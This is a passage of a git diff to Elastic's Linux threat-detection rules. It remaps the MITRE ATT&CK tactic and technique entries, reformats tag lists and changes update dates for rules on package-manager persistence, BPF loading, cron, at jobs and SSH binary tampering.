"https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml index 23ddb98d3b1..40cf153f80e 100644 --- a/rules/linux/lateral_movement_telnet_network_activity_external.toml +++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -98,7 +98,15 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by process.entity_id @@ -117,11 +125,11 @@ sequence by process.entity_id framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml index 4b6cb28a48d..121bf350707 100644 --- a/rules/linux/persistence_apt_package_manager_execution.toml +++ b/rules/linux/persistence_apt_package_manager_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -83,7 +83,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -125,6 +136,34 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -143,17 +182,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_apt_package_manager_file_creation.toml b/rules/linux/persistence_apt_package_manager_file_creation.toml index bc63025e540..6fa37d13b3e 100644 --- a/rules/linux/persistence_apt_package_manager_file_creation.toml +++ b/rules/linux/persistence_apt_package_manager_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -85,7 +85,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -135,6 +143,11 @@ file.path : "/etc/apt/apt.conf.d/*" and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -145,7 +158,20 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml index 771e00482fd..7e83bb830d6 100644 --- a/rules/linux/persistence_apt_package_manager_netcon.toml +++ b/rules/linux/persistence_apt_package_manager_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -108,22 +117,9 @@ sequence by host.id with maxspan=5s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique]] id = "T1546" @@ -135,7 +131,28 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml index 515d9e16b55..c0e77855ab2 100644 --- a/rules/linux/persistence_at_job_creation.toml +++ b/rules/linux/persistence_at_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -130,9 +130,9 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -148,9 +148,9 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -166,6 +166,6 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml index 2e4260eed94..291d6f8eaa7 100644 --- a/rules/linux/persistence_boot_file_copy.toml +++ b/rules/linux/persistence_boot_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -77,7 +77,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -122,20 +130,43 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1542" -name = "Pre-OS Boot" -reference = "https://attack.mitre.org/techniques/T1542/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_bpf_probe_write_user.toml b/rules/linux/persistence_bpf_probe_write_user.toml index 000429e62b0..7e66f75cc0d 100644 --- a/rules/linux/persistence_bpf_probe_write_user.toml +++ b/rules/linux/persistence_bpf_probe_write_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/28" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -76,7 +76,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" query = ''' @@ -86,6 +93,23 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1014" name = "Rootkit" diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml index 7f6ca634f5e..af4757fbc16 100644 --- a/rules/linux/persistence_bpf_program_or_map_load.toml +++ b/rules/linux/persistence_bpf_program_or_map_load.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ references = [ risk_score = 47 rule_id = "2d05fefd-40ba-43ae-af0c-3c25e86b54f1" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Rootkit", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Threat: Rootkit", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -78,6 +91,24 @@ process.name == "bpftool" and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1014" name = "Rootkit" diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml index 564eb7dc63f..554ad767f59 100644 --- a/rules/linux/persistence_chkconfig_service_add.toml +++ b/rules/linux/persistence_chkconfig_service_add.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -196,11 +196,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml index 6d78f771a3b..523302ed1a5 100644 --- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml +++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -145,7 +145,17 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" query = ''' @@ -172,6 +182,19 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" @@ -186,11 +209,26 @@ reference = "https://attack.mitre.org/tactics/TA0006/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml index 3b65170c93f..752d0925262 100644 --- a/rules/linux/persistence_cron_job_creation.toml +++ b/rules/linux/persistence_cron_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -164,7 +164,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -218,9 +227,9 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -236,6 +245,24 @@ name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_dbus_service_creation.toml b/rules/linux/persistence_dbus_service_creation.toml index 82ce58f171f..386571da585 100644 --- a/rules/linux/persistence_dbus_service_creation.toml +++ b/rules/linux/persistence_dbus_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -134,9 +134,9 @@ file.extension in ("service", "conf") and file.path like ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0003" @@ -147,9 +147,9 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml index dc908e15502..6d9c71de08e 100644 --- a/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml +++ b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -79,7 +79,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,9 +123,40 @@ process.parent.name == "dbus-daemon" and process.args_count > 1 and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml index f6f393dd312..10ca2105f97 100644 --- a/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -87,7 +87,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -119,6 +129,21 @@ file.path like ("/usr/lib/python*/site-packages/dnf-plugins/*", "/etc/dnf/plugin [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -128,3 +153,11 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml index 509d2fcb489..595ab2d545a 100644 --- a/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml +++ b/rules/linux/persistence_dpkg_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -80,7 +80,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -91,6 +98,11 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -101,6 +113,11 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -110,19 +127,20 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" +id = "T1195.002" +name = 